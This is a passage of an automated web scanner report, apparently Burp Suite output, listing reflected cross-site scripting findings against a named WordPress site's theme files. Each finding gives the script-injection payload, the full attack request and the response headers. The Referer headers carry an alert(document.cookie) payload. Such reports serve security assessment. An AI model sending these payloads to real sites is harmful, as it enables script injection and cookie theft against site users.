HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:13:10 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:13:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44387
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92458"><script>alert(1)</script>69527ee13c9 was submitted in the REST URL parameter 3. This input was echoed as 92458\"><script>alert(1)</script>69527ee13c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp92458"><script>alert(1)</script>69527ee13c9/css/typography.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:13:12 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:13:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44387
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d29c1"><script>alert(1)</script>4cf7d2ba27e was submitted in the REST URL parameter 4. This input was echoed as d29c1\"><script>alert(1)</script>4cf7d2ba27e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/cssd29c1"><script>alert(1)</script>4cf7d2ba27e/typography.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:13:23 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:13:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44387
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5819a"><script>alert(1)</script>9a753a5b1d was submitted in the REST URL parameter 5. This input was echoed as 5819a\"><script>alert(1)</script>9a753a5b1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/css/typography.css5819a"><script>alert(1)</script>9a753a5b1d HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:13:26 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:13:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44385
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
1.215. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.installsoftware.com
Path:
/wp-content/themes/rt_mynxx_wp/css/typography.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2afa"><script>alert(1)</script>b46c25ec446 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e2afa\"><script>alert(1)</script>b46c25ec446 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/css/typography.css?e2afa"><script>alert(1)</script>b46c25ec446=1 HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:12:42 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent Last-Modified: Mon, 31 Jan 2011 21:12:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44422
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c34d1"><script>alert(1)</script>748b167765a was submitted in the REST URL parameter 1. This input was echoed as c34d1\"><script>alert(1)</script>748b167765a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-contentc34d1"><script>alert(1)</script>748b167765a/themes/rt_mynxx_wp/css/wp.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:12:58 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:12:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cf91"><script>alert(1)</script>626365865a6 was submitted in the REST URL parameter 2. This input was echoed as 8cf91\"><script>alert(1)</script>626365865a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes8cf91"><script>alert(1)</script>626365865a6/rt_mynxx_wp/css/wp.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:13:01 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:13:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1c13"><script>alert(1)</script>2d765b40d27 was submitted in the REST URL parameter 3. This input was echoed as e1c13\"><script>alert(1)</script>2d765b40d27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wpe1c13"><script>alert(1)</script>2d765b40d27/css/wp.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:13:07 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:13:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82120"><script>alert(1)</script>9823ffbbc86 was submitted in the REST URL parameter 4. This input was echoed as 82120\"><script>alert(1)</script>9823ffbbc86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/css82120"><script>alert(1)</script>9823ffbbc86/wp.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:13:10 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:13:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac4d1"><script>alert(1)</script>a686e148c2f was submitted in the REST URL parameter 5. This input was echoed as ac4d1\"><script>alert(1)</script>a686e148c2f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/css/wp.cssac4d1"><script>alert(1)</script>a686e148c2f HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:13:12 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:13:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
1.221. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.installsoftware.com
Path:
/wp-content/themes/rt_mynxx_wp/css/wp.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b124"><script>alert(1)</script>cdcdc3bd480 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5b124\"><script>alert(1)</script>cdcdc3bd480 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/css/wp.css?5b124"><script>alert(1)</script>cdcdc3bd480=1 HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:12:38 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent Last-Modified: Mon, 31 Jan 2011 21:12:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44406
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8df1"><script>alert(1)</script>df54dde89f2 was submitted in the REST URL parameter 1. This input was echoed as f8df1\"><script>alert(1)</script>df54dde89f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-contentf8df1"><script>alert(1)</script>df54dde89f2/themes/rt_mynxx_wp/js/mootools.bgiframe.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:17:01 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:17:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63f41"><script>alert(1)</script>65897b2ba3e was submitted in the REST URL parameter 2. This input was echoed as 63f41\"><script>alert(1)</script>65897b2ba3e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes63f41"><script>alert(1)</script>65897b2ba3e/rt_mynxx_wp/js/mootools.bgiframe.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:17:13 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:17:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a58c"><script>alert(1)</script>ebe51364ac1 was submitted in the REST URL parameter 3. This input was echoed as 7a58c\"><script>alert(1)</script>ebe51364ac1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp7a58c"><script>alert(1)</script>ebe51364ac1/js/mootools.bgiframe.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:17:24 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:17:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c76b4"><script>alert(1)</script>88ae0b76c7 was submitted in the REST URL parameter 4. This input was echoed as c76b4\"><script>alert(1)</script>88ae0b76c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/jsc76b4"><script>alert(1)</script>88ae0b76c7/mootools.bgiframe.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:17:36 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:17:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44395
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad4c8"><script>alert(1)</script>947ed6e118b was submitted in the REST URL parameter 5. This input was echoed as ad4c8\"><script>alert(1)</script>947ed6e118b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.jsad4c8"><script>alert(1)</script>947ed6e118b HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:17:47 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:17:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
1.227. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [name of an arbitrarily supplied request parameter]previousnext
